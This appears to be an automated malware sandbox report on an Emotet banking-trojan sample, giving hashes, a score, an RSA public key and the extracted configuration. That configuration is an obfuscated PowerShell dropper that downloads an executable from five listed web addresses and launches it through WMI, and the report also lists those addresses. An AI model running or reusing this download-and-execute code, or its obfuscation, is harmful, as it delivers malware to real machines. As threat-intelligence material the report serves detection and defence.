SecuriteInfo.com.Exploit.Siggen2.13645.25067.4399

General
Target

SecuriteInfo.com.Exploit.Siggen2.13645.25067.4399

Completed

02-08-2020 07:38

Sample

200802-pxvad8ldbs

SHA256

4bd4448e06404510ab9d35c4f13fca11bfb149a3063e4778493a5fbe17fbd561

Score

10/10
Malware Config

Extracted

Language ps1
Source $IQYJUppm='WKOYOzwu';[Net.ServicePointManager]::"sEC`U`Ri`TYPRoT`ocOl" = 'tls12, tls11, tls';$FYOFEndz = '659';$IWRGHkts='TFYCSgbk';$VXKIXdhc=$env:userprofile+'\'+$FYOFEndz+'.exe';$LDUTLrks='GJPIKwzq';$QGQZAtqo=&('new-'+'o'+'bject') nEt.WEbCLient;$RUUNJyzq='http://muliarental.com/wp-includes/uwr_u4_ed3qzbb/*http://ltrybus.com/cgi-bin/mff_xao9d_5ld5qajfmx/*http://my6thgen.org/_db_backups/t_e_v7qizcr2/*http://mywebnerd.com/bluesforsale/zi6_v4g0_rmyg/*http://www.naayers.org/Library/o_eo_97ml/'."SPl`iT"([char]42);$RKRZAxqs='YHVSNowi';foreach($YJLGSrkb in $RUUNJyzq){try{$QGQZAtqo."dOwn`L`oad`FiLE"($YJLGSrkb, $VXKIXdhc);$JPLAVojm='IKUCCcsk';If ((&('Get-I'+'te'+'m') $VXKIXdhc)."LEnG`TH" -ge 20603) {([wmiclass]'win32_Process')."Cre`Ate"($VXKIXdhc);$MCXCTkml='OVBMCiqa';break;$QOCQNnih='VETADnow'}}catch{}}$LMSPIdey='HYSTMbpt'
URLs
exe.dropper

http://muliarental.com/wp-includes/uwr_u4_ed3qzbb/

exe.dropper

http://ltrybus.com/cgi-bin/mff_xao9d_5ld5qajfmx/

exe.dropper

http://my6thgen.org/_db_backups/t_e_v7qizcr2/

exe.dropper

http://mywebnerd.com/bluesforsale/zi6_v4g0_rmyg/

exe.dropper

http://www.naayers.org/Library/o_eo_97ml/

Related Tasks

behavioral1, behavioral2

Extracted

Family emotet
C2
rsa_pubkey.plain
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS
Q0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS
fkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB
-----END PUBLIC KEY-----

Related Tasks

behavioral1, behavioral2
Targets
Target

SecuriteInfo.com.Exploit.Siggen2.13645.25067.4399

MD5

583da66b87c441323cb85e2585a7af92

Filesize

172KB

Score

10/10
SHA1

72d3ed056c0cc6ca9cae1c80ce2cd37f05b33b07

SHA256

4bd4448e06404510ab9d35c4f13fca11bfb149a3063e4778493a5fbe17fbd561

SHA512

19eb9967f852f0b3510b48341dae050273817d0741edddb9fec4c931395b2d5767e9e38e59d921ec88224cd575e61f8afac36e74b4e9c8be6d955836b9eb7c84

Tags

trojan banker emotet